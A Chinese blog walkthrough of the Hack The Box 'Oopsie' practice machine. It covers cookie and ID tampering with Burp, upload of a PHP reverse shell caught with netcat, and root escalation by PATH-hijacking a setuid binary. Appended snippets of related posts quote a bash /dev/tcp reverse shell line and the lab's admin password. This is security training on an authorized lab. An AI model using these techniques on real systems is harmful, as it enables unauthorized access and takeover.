hack the box靶场oopsie靶机

已于 2022-03-21 20:19:51 修改
阅读量1.8k 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: heck the box 文章标签: 安全
于 2022-03-21 20:17:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/123629681
本文详细介绍了进行Web安全渗透测试的过程,包括利用proxy截取本地流量,使用BurpSuite进行网页爬取和漏洞挖掘,通过修改cookie获取上传页面权限,爆破ID以获取管理员权限,最终通过构造恶意脚本提升权限并读取敏感文件,揭示了Web应用中的安全漏洞和防护措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开靶机,看一下第一个问题:
在这里插入图片描述
问:什么可以拦截本地的流量?
答案:看着y结尾,应该是proxy,输入正确
第二问:
在这里插入图片描述
问:登录界面在什么文件夹下面?
答案:/cdn-cgi/login。知道这个页面的最直接的方式是f12后看下页面,能看到有一个cdn-cgi/login相关的信息。同时,根据提示,可以使用burpsuite爬取,这也是更加合适的方式,因为爬取能提供我们下一步信息。
在burpsuite中爬取这个网站,操作就是拦截数据包后在target中右击网站选择spider this host即可。然后能发现以下信息,这就是答案。
在这里插入图片描述
第三个问题:
在这里插入图片描述
问:可以修改什么来获取到上传的页面?
回答:cookie。继续看第二问的截图,在request栏下面,cookie明显是user的id的形式,所以修改这个很可能能拿到上传的页面。
第四个问题:
在这里插入图片描述
问:上传的页面在哪里?
回答:/uploads。这题我没进行下一步操作我直接猜出来的。

第五个问题:

问:
回答:
这题的操作实现步骤比较多,思路如下:
通过问题三的爬虫可以知道,其中有一个请求中是包含ID的,而且这个ID是会反映出用户的角色的,注意,虽然cookie部分有user以及role,但是修改id还是能知道用户的角色。
在这里插入图片描述
上述链接渲染的页面如下:
在这里插入图片描述
那么思路就很直接了,通过爆破看一下修改不同的id看会出现什么。
将数据包发送至intrude,position选择id,payload1-100,step为1,然后进行爆破
在这里插入图片描述
在这里插入图片描述
选择attack,看下结果,很明显有几个包是和其他的不一样,下面试id=30时的包,能看到用户是super admin。
在这里插入图片描述
现在手里有了super admin的ID,那么我们就可以通过修改cookie以及上面请求的链接进入到super admin的后台了。修改后进行重放,进入后台成功。
在这里插入图片描述
接着准备一下shell,后面的步骤参考了这位大佬的文章(https://blog.csdn.net/m0_48066270/article/details/108641892)
复制kali自带的shell到桌面

cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop

然后修改一下其中的ip地址
在这里插入图片描述
使用burp拦截上传页面的信息,复制爆破的id=30的信息修改,如下:
在这里插入图片描述
点击forward后能拿到上传的页面
在这里插入图片描述
在选择文件后,继续点击upload后拦截包,在refer下面添加以下内容:

cookie: user=86575; role=super admin

然后forward出去,上传成功
在这里插入图片描述
经过前面几个问题,我们能知道上传的地方是uploads。首先我们使用nc监听一下1234端口

nc -nvvlp 1234

接着新开一个窗口,使用curl触发shell

curl http://10.129.5.255/uploads/php-reverse-shell.php

这样在nc中拿到了shell(能发现我这个地方ip变了,是因为老是上传不成功,重启了机器)
在这里插入图片描述
在shell中找到以下路径

cd /var/www/html/cdn-cgi/login

然后读取其中的db.php,能拿到数据库的账户和密码
在这里插入图片描述
至此,解决了第六个问题:
在这里插入图片描述
问:robert用户包含的账户密码文件是哪个?
答案:db.php
继续访问以下路径

cd /home/robert

读取其中的user.txt,拿到user的flag

cat user.txt

在这里插入图片描述
由于上述的shell不是交互的,因此通过下面这个命令将其提升为交互式的shell

SHELL=/bin/bash script -q /dev/null

在这里插入图片描述
切换为robert用户,密码为前面获取的db.php中的密码
在这里插入图片描述
使用id命令看下robert是否有特殊的权限,发现其还属于一个叫bugtracker的组。
在这里插入图片描述
接着使用下面两条命令查找一下bugtracker组有没有什么好东西,参考了大佬的思路。

find / -type f -group bugtracker 2>/dev/null 			//-type f 为查找普通文档,-group bugtracker 限定查找的组为bugtracker,2>/dev/null 将错误输出到黑洞(不显示)
ls -al /usr/bin/bugtracker								//-al 以长格式方式显示并且显示隐藏文件

在这里插入图片描述
发现其中的bugtracker命令是存在s权限的,“可执行的文件搭配这个权限,可以得到特权,任意存取该文件的所有者能使用的全部系统资源,我们尝试运行它,发现这个文件根据提供的ID值输出以该数字为编号的bug报告”–参考了大佬的
接着使用strings命令看下这个命令是怎么运行的
在这里插入图片描述
其中包含cat /root/reports/这条命令,其含义是bugtracker调用系统中的cat命令输出了位于/root/reports/目录下的bug报告,robert用户本应无权访问/root目录,而bugtracker设置了setuid后就拥有了/root目录的访问,就拥有了root权限。且cat命令是使用绝对路径而不是相对路径来调用的,即在当前用户的环境变量指定的路径中搜寻cat命令,可以考虑创建一个恶意的cat命令,并修改当前用户环境变量,将权限提升为root。

export PATH=/tmp:$PATH				//将/tmp目录设置为环境变量
cd /tmp/							//切换到/tmp目录下
echo '/bin/sh' > cat				//在此构造恶意的cat命令
chmod +x cat						//赋予执行权限

在这里插入图片描述
"
这样bugtracker再次调用cat命令时实际上调用的是/tmp目录下的恶意的cat命令,我们运行一下bugtracker可以看出,此时robert用户临时具有了root权限,执行id命令发现只是robert用户的uid变为了root,不是真正的root用户
"–参考了大佬的
在这个地方执行上述命令后,要再执行一次

usr/bin/bugtracker

然后发现robert用户属于root了。前后对比如下
在这里插入图片描述
既然是root了,那么读取root下面的root.txt文件,拿到最后的flag
在这里插入图片描述
至此,完成了后面的7-12题。总体截图如下:

在这里插入图片描述在这里插入图片描述

这题做完了。很多内容参考了大佬们的内容,按我自己的实力,到了用户的flag那步就到顶了。参考了以下的内容:
https://zhuanlan.zhihu.com/p/332338130
https://blog.csdn.net/m0_48066270/article/details/108641892
https://www.cnblogs.com/black–horse/p/14715272.html

这其中还有很多不懂的东西,如:
最后拿到flag的一段执行的命令是什么意思?大部分都不太明白。回头我会再学习学习,总结总结。争取出个博客写明白些。

渗透测试练习靶场hackthebox——Starting Point Oopsie攻略
TF0xn的博客
09-18 3561
目录连接配置扫描 连接配置 见这篇文章,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 ...
HTB靶机Oopsie
m0_46412682的博客
09-01 1673
HTB靶机Oopsie 1、VPN connection 2、信息收集 ①masscan端口扫描 sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28 ②nmap扫描端口对应的服务 nmap -sC -sV 10.10.10.28 开放了22端口和80端口 操作系统是:linux 3、访问80端口 没有什么可以点或者打开的地方,拉到最下面,有一条提示信息Please login to get access to the s
0x07-HackTheBox-Included
0pr
04-27 610
Recon Masscan nmap 超时了,换成 masscan 只开放了一个 80,又一个 webapp 练习。 Enumeration 主页是这这样的。我今天正好看了 这篇讲 Directory Traversal 的文章。 直接列出了 /etc/passwd 的内容。 打开源码,可以更清楚看到目标机器有一个普通用户 mike。 没有权限直接访问用户家目录。 再找找敏感信息。 我查看...
[渗透测试]HTB靶机-Oopsie
Y4tacker的博客
07-22 702
文章目录Oopsie Oopsie 首先跳过nmap扫描的过程,现在我们直接开始日,发现了 http://10.10.10.28/cdn-cgi/login/admin.php 用admin和MEGACORP_4dm1n!! 这里存在一个水平越权的漏洞,具体不给出分析了,看cookie都懂 垂直越权后发现存在文件上传点 这里来反弹一个shell <?php exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0&lt
Hack the box Oopsie
qq_41696858的博客
07-03 416
1.靶机IP 10.10.10.28,常规nmap -sC -sV 10.10.10.28扫端口,扫出22和80端口 2.打开浏览器,访问80端口,页面上没有啥,查看源码,找到/cdn-cgi/login,找到后台登录入口 3.登录,用户名 admin 密码没啥特别提示,尝试上一台靶机的密码,果然一样 4.后台四个模块,account模块管理账户信息,uploads上传文件 看见uploads,就知道找到了shell上传点,点开需要super_admin权限,通过抓包发现,其实是通过cookie里面的use
hack the box archetype靶场
qq_42754807的博客
05-28 1245
hack the box archetype
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4471
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
连接Hack The Box靶场教程
Atopos545的博客
01-24 2132
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
HackTheBox——MonitorsThree
m0_69530377的博客
02-19 1007
8.使用curl请求这个端口没有返回,使用chisel将端口映射到本地,chisel可以在github上下载。7.访问子域名,是一个登录界面,通过查询知道是cacti系统,是一个图形化管理设备的系统。输入正确用户名会提示发送请求成功,错误用户名会报错,尝试几个默认的用户名后发现。,注意不要选到和source同级的tmp目录了,要是source目录下面的。先进行bp抓包,抓到第一个包后放行,抓第二个包,并复制以下内容。3.浏览器访问80端口http服务,无法访问,域名重定向。
hack the box oopsie 靶场练习
鸥鹭忘机
07-30 1310
扫描收集信息 今天来练习hack the box中的oopsie靶场,如何连接这里不做过多赘述。 连接过程可以参考上一篇博客进行了解:https://blog.csdn.net/rpsate/article/details/119190220 首先扫描一下端口与服务信息 nmap -sV -F 10.10.10.28 -sV 代表扫描端口和开放的服务信息 -F 快速扫描,扫描常用的端口 好我们看到了开放了80端口,应该是一台WEB服务器,我们通过浏览器访问一下这个IP试一下。 果然出现了网页,
HackTheBox - Oopsie
qq_45862635的博客
06-12 1055
Hack The Box :: Starting Point - Tier2 - Oopsie
HackTheBox-Oopsie
LYJ20010728的博客
07-27 693
HackTheBox-Oopsie连接配置信息搜集路径泄露网页登陆越权文件上传反弹webshell升级shell横向移动提权下一场景相关信息 连接配置 参考之前写的连接配置,文章链接 信息搜集 Kali中使用Nmap进行扫描:nmap -sS -A 10.10.10.28 ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sS -A 10.10.10.28 [sudo] password for kali: Starti
Hack The BoxOopsie
Ho1aAs‘s Blog
07-24 847
文章目录前言解题信息搜集访问apache80反弹shell切换到ttyUser Owns Flag查看www源码切换用户System Owns Flag完 前言 操作基于Kali 2020,参照官方wp 解题 信息搜集 nmap扫描 nmap -sS -A 10.10.10.28 扫出一个ssh和apache 访问apache80 浏览器访问一下80康康 F12审查元素和Network 发现有一个cdn-cgi/login/,应该是一个登录界面 上一道题知道了管理员密码是MEGACORP_4dm1
Hack The Box 靶机
PJF1501105594的博客
10-24 2285
Hack The Box 邀请码获取 控制台执行makeInviteCode() 查看返回的json data 然后按照对应的编码格式进行解码,按照要求进行获取邀请码即可 see: https://www.jianshu.com/p/1201a0d2cdfe hackthebox 入门攻略: https://www.360zhijia.com/anquan/439315.html h...
Hackthebox----Oopsie
CyhDl666的博客
04-20 509
文章目录信息收集登录webshell权限提升 信息收集 nmap扫描ip地址 nmap -sC -sV 10.10.10.28 -sV返回选项找出远程主机上运行的服务版本。 -sC: 等价于–script=default,使用默认类别的脚本进行扫描 可更换其他类别 22端口就是ssh端口 靶机是Ubuntu系统,开放了22端口和80端口 22端口: ssh端口 80端口:80端口是为HTTP(HyperText Transport Protocol)即超文本传输协议开放的,此为上网冲浪使用次数最
Hack The Box靶机——Ambassador
qq_44029310的博客
10-10 1097
本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consul命令执行。
Hack the box靶机 Arctic
菜浪马废的博客
06-03 442
找到后台登录地址 coldfusion 8 搜索漏洞 找到可以上传的地方 需要payload 使用MS10-059 https://github.com/Re4son/Chimichurri 完成
hack the box netmon靶机
zr1213159840的博客
04-14 1381
本来看着这个靶机,觉得应该不难吧,结果还是看了不少东西才学会。按照惯例,先开扫 nmap -sV -Pn -A 10.10.10.152 这个地方有几个有用的信息,第一个,ftp匿名,第二个,80端口跑了服务。打开后,能看到以下页面,同时注意这个服务的名字,后面要找和这个名字相关的配置文件等等: 通过扫描的结果能知道ftp端口是能够匿名登录的,那我就不客气了,直接登录。注意注意,这个匿名登录也是要输入账户名的,账户名anonymous。(这个地方多说几句,我才开始匿名不输入,直接回车,我还想为啥登录不
Hack the box靶机 Blunder
菜浪马废的博客
09-20 503
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
在线靶机
最新发布
03-27
### 推荐的在线靶机平台 对于希望进行安全测试或学习渗透测试的人来说,在线靶机是一个非常有价值的资源。以下是几个值得推荐的在线靶机平台: #### 1. **VulnHub** VulnHub 是一个提供多种虚拟机镜像下载的服务平台,允许用户在本地环境中搭建漏洞环境并进行渗透测试练习。例如,“Lampião 1” 就是 VulnHub 提供的一个易受攻击的机器实例[^1]。虽然它主要依赖于本地部署,但其丰富的靶机种类可以满足不同层次的学习需求。 #### 2. **PentesterLab** PentesterLab 提供了一系列高质量的 Web 靶场,专注于常见的网络安全漏洞训练,如 XSS、SQL 注入、文件包含等[^2]。这些靶场可以直接通过浏览器访问,无需复杂的安装过程,非常适合初学者快速上手实践。 #### 3. **Hack The Box (HTB)** Hack The Box 是一个知名的在线渗透测试平台,提供了多个难度级别的虚拟目标主机以及网络服务挑战。它的特点是拥有活跃的社区支持和技术讨论区,能够帮助参与者解决遇到的问题并提升技能水平。不过需要注意的是,部分功能可能需要订阅付费版本才能解锁全部内容。 #### 4. **TryHackMe** TryHack Me 是另一个流行的在线教育平台,专为信息安全爱好者设计。这里不仅有针对特定技术点的小型房间(Room),还有完整的课程体系来引导新手逐步掌握专业知识。所有活动均基于云端运行,因此只需一台联网设备即可参与其中。 #### 5. **Cyber Ranges & Pentest-Lab** 如果倾向于自己动手构建个性化的实验环境,则可考虑利用开源工具链创建专属的安全研究空间。比如提到过的 `pentest-lab` 项目就借助 OpenStack 和容器化技术实现了灵活高效的自动化配置流程[^3]。这对于有一定基础的技术人员来说尤为适用,因为它给予了极大的自由度去调整参数设置以适配实际工作场景的需求。 以上列举了几种不同类型但都非常优秀的选项可供选择;具体选用哪一种取决于个人偏好及当前技术水平等因素考量之后再做决定会更好些。 ```bash # 示例:如何克隆 pentest-lab 开源仓库到本地 git clone https://gitcode.com/gh_mirrors/pe/pentest-lab.git cd pentest-lab/ ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值